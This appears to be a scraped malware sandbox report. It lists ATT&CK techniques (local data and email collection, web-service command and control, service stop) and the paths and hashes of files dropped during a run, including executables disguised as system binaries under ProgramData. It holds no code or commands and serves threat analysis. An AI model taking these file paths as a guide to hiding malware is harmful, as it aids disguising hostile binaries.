
Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

Filesize
3.0MB

MD5
81aab57e0ef37ddff02d0106ced6b91e

SHA1
6e3895b350ef1545902bd23e7162dfce4c64e029

SHA256
a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

SHA512
a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

Download Submit
C:\Program Files\CCleaner\CCUpdate.exe

Filesize
697KB

MD5
0f0b90a01f049665ca511335f9f0bf2e

SHA1
baf4016e50050b24925437864bfb3c19d0baa901

SHA256
4ad9635351c8e8579c4d4c2bdd679ea7b135ec329adc6fd5d8211255e2e666be

SHA512
44da936d020e857bf3bfa2bcc7a91182da9c1f320fe041bb2836d4e8ae99d4b939ea27842b49b9a2cd24e09c7698579617584d431a2b2f7eafdafa1fb9a59c50

Download Submit
C:\Program Files\CCleaner\CCleaner.exe

Filesize
37.2MB

MD5
3e5ea83116e583ad04c34bacac5f56ed

SHA1
72c7bcbfa7d9d4cd7985f055f34550c028c6443d

SHA256
24a4f1c3030bfe0947afd19207311695ed626a4cc1033badda6126b79848a7a6

SHA512
142050299a474bbf1e063f21902f796ee9fc17c9a0006532ddccd4440ef2a0565970d378a79f5a40ac68c51f15b3526686caa2c3d2b6974fcb738223bd4769f9

Download Submit
C:\Program Files\CCleaner\CCleaner64.exe

Filesize
43.2MB

MD5
1af32ba5eb1a80c555200f8923bec33c

SHA1
497fe82f8192db81afb83e6c3b5309dba6c64a51

SHA256
f7e82f63ae0f6aac25332b763049bfbb5824239b4c61a02c3502a4fc6c6adb1b

SHA512
0dbb9274af44382e30cfe898156b1d8f79fa51cff23a2eeb582090f99648f4aa6c359013dacbd4c8bf221de0127b1565747293f9716b50641d16911f97998dac

Download Submit
C:\Program Files\CCleaner\CCleanerBugReport.exe

Filesize
4.8MB

MD5
a841007c96318cd81ee16c7c3a455602

SHA1
86ff1293ce4bf07920c1f0fbbd9ea22fdfff2d95

SHA256
fa7e4bc1d5beee3b04119497ec9da265225f2fffc1264fc109e9a4db58ad1c74

SHA512
b7bea38c7d305bdb6d9b9db416ce6a8f0458a5fd958a93291071f173270d606289f92b4b3a54dac28635c62dc3b3d64d17abfd723ad23442cec77525b5c92632

Download Submit
C:\Program Files\CCleaner\Data\DUState.dat

Filesize
173KB

MD5
d1b54023a1ec9d3e7249bea19e3ed544

SHA1
c976c3af8da40d82fb72365b0b52b26780509a98

SHA256
d66254809161a49ae40d45fd9ee492848dfb75fc48a861a04b3d76d277e2b5ac

SHA512
dc56985f15eb0d78916a352a1faf8a09be2363b47a607a7f1431941b717e8732d7b11b85b83b73b18699a8e0a89d0299d8d5ab16c1a86db34d036bf6c9b5b2f9

Download Submit
C:\Program Files\CCleaner\Data\usercfg.ini

Filesize
111B

MD5
87b94072a0f5208c4921a75ebdf8fc1c

SHA1
6ecd4b5ff84543218b7f0301c66300ed7e1b146d

SHA256
48f03b395e2c274129dab22b8c81b047b26a115062b488a9dc72affde139bd91

SHA512
a92f7cbf541e29280235b67adc02b4e6371e3330f94ddd9c7c41ea4c1e4da9770b3d4e7c464fa1a62556f857002c79d0076ba2ccea05212c530cf453d55d14e2

Download Submit
C:\Program Files\CCleaner\Setup\1bff2fdd-36fb-4520-9a0f-e2b7e17ff828.dll

Filesize
469KB

MD5
fe6f58fb55d9a93502528c3c9bb13a3f

SHA1
516275dddbc9e2f056342201b03a0931d93a6239

SHA256
c427bcf6b065edf06662e0540e3e9a21c07095184e7bb9d05926dc3b79fc3348

SHA512
7f45f187d6c3156b89e2daf0c2bfdc60a59140ff94f8255fa672422abc43aa1252b0fe0fa0a3ef675f9e71c33b26424597c015db83dec7f5e20ee8769c61c619

Download Submit
C:\Program Files\CCleaner\Setup\46bae663-dfaa-4491-83c8-4eca7ae7d0e2.ini

Filesize
170B

MD5
2af9f69df769f876f6e02da18e966020

SHA1
5d21312d9bd23a498a294844778c49641a63d5e2

SHA256
473d48a44a348f6c547aefd2c60dd4b9de0092e1fb94a7611bdd374783ef3b2c

SHA512
a4705e5491cf03867fd46e63293181bf761d04fe0cccb86e373dd567c68d646634f64ef95d5b910d2266468b93bf7cdf6f9acbf576c6f42a4ff6c3caa09d2274

Download Submit
C:\Program Files\CCleaner\Setup\config.def

Filesize
27B

MD5
05927e894c81eb42c3b4dae5a5a6c937

SHA1
7ec0660aac7c3396599447a49f30ba18e1f0db49

SHA256
09c65b39bc891e12956ab7bb30fae147ef7c8fa37542b6f040613436b566e7f8

SHA512
c06e2788952a3550597f5b539cf8f5cf7a569e33192951bc8ce97d4570bd4ba35abce99586f309f3e1cffe6f1d83aee98b79c0c26503ef4cd4d1fbfb40e1ba4e

Download Submit
C:\Program Files\CCleaner\Setup\fc1109e9-b06b-4d85-b624-02bc3519328f.xml

Filesize
818B

MD5
47140876852d8ece2d6e48dcebe31169

SHA1
41b349626a84b2b7a95ce5bce11ab55c5617699c

SHA256
abdfc16e71bd74863dbb57bf138a92cb05f8e2fe4f297838b2d38b014a06c882

SHA512
7209b042d6b17c6fa76533debf6690a8108777b95a12f70dfd42fbf9114a93c50af185af77aedfee83a525c2fe5f8b2c0ce59dc4f9160bda2f42dff1c59fb0b3

Download Submit
C:\Program Files\CCleaner\gcapi_dll.dll

Filesize
740KB

MD5
f17f96322f8741fe86699963a1812897

SHA1
a8433cab1deb9c128c745057a809b42110001f55

SHA256
8b6ce3a640e2d6f36b0001be2a1abb765ae51e62c314a15911e75138cbb544bb

SHA512
f10586f650a5d602287e6e7aeeaf688b275f0606e20551a70ea616999579acdf7ea2f10cebcfaa817dae4a2fc9076e7fa5b74d9c4b38878fbf590ffe0e7d81c9

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

Filesize
790KB

MD5
8fec9be10e382c5911e72bb7e08a90fe

SHA1
7bcc1def08801a528cce82db9027a77d3c9df688

SHA256
4562ae56ebc11cbf378e36f1ff6d3b8df25c0d51d355d4c19b6538982a4415c0

SHA512
3e766bdc2f083f99dacfd24b79746e33da98878dedbf660ec88a21521737d70cb7d71a456f46c31f96cc065d305e534cf9382bb289ac60ca15a321d34cca55d2

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json

Filesize
738B

MD5
132a0a6ea9bdfecb1668abf2b233367f

SHA1
d1757b8941de5c9d75cdf3af0e257a6604da153f

SHA256
90fa3e933692c9ab80c323cd3fbf6750d5d3e593a74b81364c0cb0439a0d8699

SHA512
445a010162d85f4a696d447f2e2f96d566f9c0bb0b11371c46e375ca7306b97f5072775d5cbacff425b9a6c85ed7a5b106177db172981dd82e7ed7b8542e2de0

Download Submit
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json

Filesize
831B

MD5
65f3f112f8ac531662b141ec4f786374

SHA1
d200e264cd378b5b321ce1f322bbab0b0c09234e

SHA256
5dc33672ef2c2a2c483baf5cc9e6b2e19026393c5830152e3c7683518a98cebc

SHA512
4bd80004af02858468ef168cfda5820ea3e668f95a98bd5f7938398c09a18500b526141726a69372af94d0a72d291ecc3587823b7e06e3c86fc73b249e23bb46

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e067532ca9807a39\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
8757a2f933551d4c934f9d327ae6e871

SHA1
f2eb6851bc0271506eb820cf18b831c35e74b9da

SHA256
d8e458f3c184b39cce9c4f05f3f37a76a934b9cca19f061679ec340ac53d0c3c

SHA512
eda58aafa193be046433e05afcd1b9faf8362d718ffbee2297dbe0b3eda701496c785c2ea4f72b7de88cbef67f0552065c337eb87a40c81ca8050f06fdd801e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\37ebaf8b-8873-4e0e-b866-db25364140a9.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\39ba519e-1bd6-4568-928f-2327e8a39d90.tmp

Filesize
7KB

MD5
e8c31a370c8edd41ece896f464e33dda

SHA1
61c479b9b756e197f4d6b1e55ffb86254e098b07

SHA256
092146d2e2e4a22135e8580266c4bfab78dbfa58c6051b341b3e82ca5e081b98

SHA512
5c6e44cc02cbf3a3a6ab22f647ca792b210d74f7728d041e77b0ca749ce2023fd669e1b12f07a40b63ba29ab33d8f76b05972c541eb895f19da275d06fc65ff5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\5026bd69-3c8a-4124-9174-33ac1ccca50f.tmp

Filesize
7KB

MD5
82c2fce16b6c6ce5262c84d4e48dde63

SHA1
2b41cdf901f541d3bda70e89535fd42be17987f6

SHA256
72d4923204521603b3a05b3adadf42b98520d9b2c01acce8241d93a2e88c7a7b

SHA512
4ccb92006968f7fd0b938ed7964e0cfaa6e34cf96fb22583e540b319eb6f49f6c8b95b3fa8e603998cb44f616f242b8a3edc772cc30c984bf8ce0cd766bc4efd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
0de7f82f508777526bb28ff0659ce5c2

SHA1
2c611e0c2cca5e4237e68a18789ef891071eb470

SHA256
2df48cba4cbbda3497bc37c6e45ee67d46562648088b728f29e1a5f0c68b1eb8

SHA512
5484b4260403fbe41fd0fba59bc5845e05795b092cd6af5cf7e9761182d5ec21fb7b5145b4f143bb37ffc0797cc357399b4f4f215f65f8974a3fc2e448ff5f49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
857b6993e7af72517d6773c03a94a754

SHA1
71b0b749e033d3c64f1ea6169c398984dee1a9f4

SHA256
30723a9e74b44140e1ae46829649cd2a3b4ca03bff44fe9c07344153ecb78067

SHA512
1e22ab78bb958ece7e5a34af39dacb3a34103d3d6d928cdda8e2f3e4f7e85940d741502fed7c311ff24573e25e5faadb2ce84d29b18eb08e549e331b0d7782f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
32KB

MD5
bde8620edd3974ae5a25d5c1722de3b5

SHA1
114a8561ee2ad01f71a3a352fa026f995a461578

SHA256
60e85d28524cace251aad73d4a1c433a72ca31644a244d31dca394a508463603

SHA512
2b78fc4bce1d01547a0ea15aec6217dde6738353574559c42308f2fd0965d4b780ba36e478b0f92402c6bdf0cc0e8a0c53651ea018dcdfdae65ee78ab8d6da33

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
8KB

MD5
0eac321abee45f0d1d40794c44722bd3

SHA1
f946c2d0c1fbf2607ef3bc353e8947263fdec2a3

SHA256
35b17b8bb3ada012d17b90306fb9424d0a67e097179e8bc26a9f3027bcaa0c50

SHA512
de2b7826c39a0e318268b30d167e675c9003e41be3b7ccb95cbd3d720a1b91484f388e0fbb577303bece7218e8e6b836b136afca886049e85f4cbf5666dba7f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
f36985cd681c071fe3c1c69b143815d8

SHA1
23d47d8449d089a5237c29eaa8cd04fbdc38ba8e

SHA256
3dea669930f08047443c0a22c5fa57e2bfeda6bab0efd76ded97715c563eda50

SHA512
e3beaab1256ee8226e9a8769571abbe000ea7c69f1cc5518e41a9427159b2f8f0bd5d197c86c24c66650a602c63e59c42d416ac3febdae8f24ef1ec3f1fcc6aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
254B

MD5
e12e983a871f80ff86c767ff885c4734

SHA1
5a92d29a05af5b9e1f7670cfed0e7a253508f74f

SHA256
af1ad1f94bdd651cb557b1a80403afceb87ce8fc5b2dc0eecdc4572b83158409

SHA512
3e31574b14163fdb96cfaeedeb72b92ef9a29aeae12928e23b6e41825fb410fb4ff7901b05459974ed17d086e4e04ee61f283665bd05bd200784a282b485e1fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
7419c33daafc6ecde8d977ccfffba54e

SHA1
79ffa0143da60e425c53ca3d4abf5d8c4ee2cb3a

SHA256
d546a9ed25ab5a4675b557f619b21c56aff425fb2f734686de15987ed8fa5b42

SHA512
629c454b865d4852fab0c41396063ac6d4e97af8e01c24f695588caf315f7654488cba2007524f2077f098dc0adcfdf7a21a1d4828cad093e9d40b106ff85907

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
71c9a51508a43d81ed7be3bada80815a

SHA1
c917acbf6b653c08f7c2d74a4b782cce44bd8650

SHA256
7981617e481b293144ea50c2caf8d51c2ac06c03ae6be6a6b5627c681139c690

SHA512
06f1c5b9b0aac140807ad8c495a5835988af09d971d9057396f0de06b5caf5e1f0cefdbb149a48f3bb38a2b94a9e92466a1a71964350f414527ecf341c7e33e9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
75347ae42cae09458b0f0ad4dc7e7035

SHA1
681348d28783872e758ff9d4b6c96d884a11bfad

SHA256
9aad938db304cf9da529c3fbc743e05b496f64884e8c5d25fcc117f212559480

SHA512
af992b80ec93085661ca7ad47106712fdd5341fe4f7553f769d2fcc52e263ec7e0630ea38961ff819122184b1783c8d8ceb677931a9d15a4596b092f44168739

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
0c71e2c6e651b0f1e7b6daf892151fa7

SHA1
5fa4e3b25231e87ff3d76c043d45db59764ebb34

SHA256
34b5871f69cd554bbe222a2898f987daf961aff24b2da86e626c1617613f8709

SHA512
bb46d36595850e39e17787dd8d541fc8cf938c988a060c2bc3956fb6c34856c85955d1595d90a7a430084aa9eb9e8b033e441f19f1dfad850af77b575a876c58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
189B

MD5
68fd32e716dbec6bc6ab7cd3a3533bcc

SHA1
fb1d37ed05bbb5d46916c007214809914f9cb4d0

SHA256
99b8fae4fb55e1b07f42f2bc3accc740392755f4e6990dfb9aa39a478fc860c5

SHA512
442ed4d79b4c4d74e321f215df32a6348accd73d708503576c313b6752f3a6ad27ef50402bf4caa67fc88e99ddb34ab0f4d01b6c62b3b38a3854464ec05fb6e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
6d3229b31ea54aff1c9fc8683e77bec8

SHA1
e56627fcc42a722695de7872a0e23e852aac7275

SHA256
f2189bdd1d2a55ef5cc026f93a478d0d3969e69e7cc74dd200686526fa7a9287

SHA512
0bd19f0daae2c766768004c66fa9cafe3006871c837168c0e411d71f719ddefb87eea416f7abbed07fa8806b6f25d54d098f2f262d7735c23525cd6cf582343f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
5abed26e4fa6ec0c06c794f289796875

SHA1
e630090f07beb661cdd1ea3ef7543086e1499d79

SHA256
07fc27af683af83e66fd94bd1713b3aac9e02c02b04ab62d62a65244d8dc810d

SHA512
8973461f3de4f757e7f4705affbb0b750f95fd2f2abd028a1117607bc05b4e6f20af7ef54656396858d1b39b344b581593c2aeb47d96dbf9d02cc63c9474ce63

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
e748c951578a9173ef6f6ed0f584faeb

SHA1
754c7119d1a90bf904b3d9f3fd96bdaffd4d4caa

SHA256
30559beecc73ec234f533d5c2058303bf985376946746fbf09b83c046704005b

SHA512
d8b64d82ce1d84a16a60913158fa8dbbb450ed06f8742f47479ecd779615ddf1da9c0053c87591d12693b717bcd71735be338d925f375bc63c658c9b5cc25a61

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
fb5817b3e4c665198dd7999186531e86

SHA1
d6ff8a79e5f0da9c05053ec4b0b67c0533e55993

SHA256
c2350623be0fec466ce7f3194c220aa2128ec9c507d755e10aee015e128cb548

SHA512
169cccb83b5dbec645fe2c6345ce6740c7207d3a3bfa12de8523474e8b386235b5471eb4dbe536f0461223ffee29b120e5cea2991adcc5660b59a7958ad1f5b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
6ffb9f94be4964dbf2fc75dc004a386b

SHA1
c3bdaa1076af6546cd606866fa69038329235a03

SHA256
eb1f636be4e88b3f6692d635976df3a71ce949b322a18f835d0753b2961bb79f

SHA512
8fbf975407a29ac3c558f8037ae4628fe08e3edbce9e4f18caa242ca134dbe4121d421e2f4ebf0581036349a07e4597a2d3e0697265730e52b8160aabdbe47f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
fa1237ef0aae8c9abee6facde2ffaae9

SHA1
e65348cce460d03f0751c0ca48a2d8e499868766

SHA256
6413dc3da55482d4310204be863da4238ca70e596357d4762320aed614fb2f77

SHA512
e0e1a7708e535bba08387e6d572f05756bcb77a9ff7bb215cfc6fce55100881f269159c61f4ccb8ba5302d169cfe472827b88155719a7ba23b1c312115385605

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
ea5aa7436d4132c736980015fc74584d

SHA1
5548e240f58e3be9d168ebf149d57f022620cd1a

SHA256
022a63c29390c9efcd08dd87fcb0f285584fa429a6d7ec2329f3075908272575

SHA512
633b9d522910fc90a9243b73e26926a0f9d7eab867f86ffc1266d962f569db36920ed8a9356e3135f6a3c9d85a0aafec2c1e02eef10c19c5f9e94bf5389ec9c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
3a89ceba0ca38b150f24f5fd042f544a

SHA1
31aad46fb3259f3c079e5e74d618fc61d11dd5b8

SHA256
7b9f437601b3db0f62c4af567cace9ec659f50f94b14584bb3f6fc1ab9e829fc

SHA512
8f5361631d030a9029a70902d4ad89d8598bf6cc3cd313a415b15521984c202f312c787933d71ad3c471fa84c21a8bf908c61bcdd0cde55f2d0f9100fb5d9b3f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
22KB

MD5
2acd90c6492a6a7fd277349f23260a8a

SHA1
cf85c5baa9285c1a077fd097ad02eb6d97e7bdd8

SHA256
5248257e7248bb0879f1aeb0f85dba805b8e79291d2a4874735c23b5ad62a869

SHA512
22944d798f5b93b7aea2ec39a96b3ad258d25cd982e9a182e82bc52386c30ec76369ab251e587d617e202ae5867ef5408deb38b380ea2924d22c40dfe17b9531

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe57e37a.TMP

Filesize
120B

MD5
31a2e9e92afc2cda333637f0156d01e0

SHA1
d02a93b4cc4c3c5bde0c8c729194a27e9f604579

SHA256
83034abd5b3a91c9fa98420cd461dd381e8e701649af7e325c4472321cd6e39d

SHA512
871e2f0b1cf5e1017c4f58303a5e0114007951ecaed59f0c8cfcb60411c81c278bd3f9b4d7176a3c0ae0833062a1deade3d2b38cb9a1edf3bd56fe684d00c7d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager

Filesize
44KB

MD5
3df51ef50dd2da3269fc26ba4ed9fc34

SHA1
33abc232dfe0e531ff267e1311975b93b5eaeaf7

SHA256
e4645a810936c416fa0e64b05814f1416e1dde771dc92dcded073cecd924a3cc

SHA512
571c9549fb4199d3f7b7e8a01f951c70614afe52745024ca117e99b2e112eff39d5fdf279da01eb3866462467c99632713ce0daaaeca5033d9a1d685a9dff957

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
18e11feedba29ae9895063aafc9a69fd

SHA1
6b84ad7e9be0dfff1ed1167c1d7f0d3e7973fca8

SHA256
d0431492aaf1af65d557e1c07ebb36362f82184d0c6e06445cc85d25bf4fd547

SHA512
3f71c59788ce6366d5788d81a638822be83e1ead988ffbe517087b64dad6a0e07ce27aa935f352dbf05348f49101a9190a97d01f5af38b4ae2978566e2ef0f14

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

Filesize
264KB

MD5
e961cab270aa5ee4f6f09611582a7e49

SHA1
27cf5d85332d4d38d08a8efcdd3aa7f50c888363

SHA256
b13111dad85df8fd97304b1cf52fbd331b21c6b5e22de07ac191a28c2609e69e

SHA512
eb3e9ffb9890a79a983a2c65fb3660256b149bb76b558bd1ba79897c312274bfb4a3752c165b9eb461222a5335761a43301d817a81c52a0d335c72c033bda989

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
127KB

MD5
3b8459c968c1809d879b77cd9ce309d8

SHA1
a340b9cc8db125e52ea5b5a0c9369126bbe5c54c

SHA256
f076f57158c5c569790ebc4add727cd2f1bf1aa7e44fc2a91144227e2f7b8d54

SHA512
a222d933f2d59644d6620ec74c3a6f0fb4acf7985f97a734f4b30bbb844f584b158842e6dd289b6ec71142041843b4e614dd609f3f7a5fcbb498070c17f69b99

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
251KB

MD5
7350a0fd0f9cad10f86e82955474b7de

SHA1
53de3c3a62dfe280abd5bf0d18283ca7caa0ea10

SHA256
3f11de352c2c738eafec4a69359734e15f8b7b2fef4ff96f74baeafc5dbf9fd2

SHA512
2a571660ed41e1da294e8f7fec3304c4670ed5e78392a20682e366403910dbd7aad0ba50f769886ea09e954c54f2b3708922ddffdf681772a82f9dd61a63f505

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
127KB

MD5
7e3c64fe2775cd21369458c31d8885c9

SHA1
90dff526123398a8d1b1916661e2f0dd8c8b92a4

SHA256
b60b9bffa02cf21e38354e997d2732a8b440d942daf9f25ee4d00b59330f2615

SHA512
7d6c8f447bb621d90026e75048e2ebe365af7549f2c6d43607418184ac841dae449aa213c918e68bb1f9280a2feea1e6b3f3093d0e858dc8efbd3ea3b97f32cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
251KB

MD5
e3901d28d566fd924e3e8fdd8b582320

SHA1
4c0ad7d485520a52db5f8470177054dd757b43ca

SHA256
b4fc680142a2ce327ed1c3eafacf1177b74d2a7a81b5dfb4886eae2051ddf749

SHA512
7209a524aa64eb58bddf82d88dd99d34cced23c8e0ec28a5a4c89673615cbb20151ba4bcf8a830f7b60e6ded0760f7db33aa3c313151d5aed0d454af7d87597a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
98KB

MD5
e37df7f6032b6d6b2136e81b699454ab

SHA1
1f8ad53c7cd35547d97380472a9f770497547369

SHA256
619014490f51b4c6f49df423193349e442669a407b425c49b325dbf44646d4bc

SHA512
9bbcb3c38943b71805b32a52d369df32affb0035b0b6d740ea2cbbf3e7b216ad55e92335038949c3a30184f1987f8bad9f130aac11866bed9e0643f5aa4e7ecb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
98KB

MD5
391feefbd9c690067a4738d978c00ca8

SHA1
59327257f5c3d28dd5dd36798bdbad47b38e932a

SHA256
f3605eb85e4c5fccb9c67e730ca1b4a6f7d74f7b0e1020357993f3dc6bfd0886

SHA512
3e61ffa665afa0f15f93696801f610847a3e9d075cad517d6049c7aa2ca99e0e3453d8489992c08a189cdbef6e9bef2f81a5ae9fce519edff014e6929fffe376

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe583989.TMP

Filesize
83KB

MD5
3c6d21c44c972a5a03306598a9e441b4

SHA1
c05b2fc050d3ef9b092c599e68b62a4611c59237

SHA256
ed82d3c2ebfe5f556fea73fe4c1b6226199a6594979cb4a5412295b5fc00ff53

SHA512
067ec55a8a46ee23f288ec63e40e81d43dc2dd93b3c79dd2348a1456b9fabfd41bd006f2f3d8538ef99ac56668fcf70fe637032791c826574b077734d55ad63c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
493e7e14aceba0ff1c0720920cccc4a2

SHA1
468f39cefbcf14a04388b72d4f02552649bf3101

SHA256
a0dd32ed60115f661a4ca537472e0d4e230ff844d56a3db766299cf4cd817842

SHA512
e16c748e4513ea10bf7124cef7b50dc5f3a1802205af9228e0c33fdbf3c24286739db08db4b813079ed7cc36be43d7457f4c26f00ae3126a2fafd77d2696107a

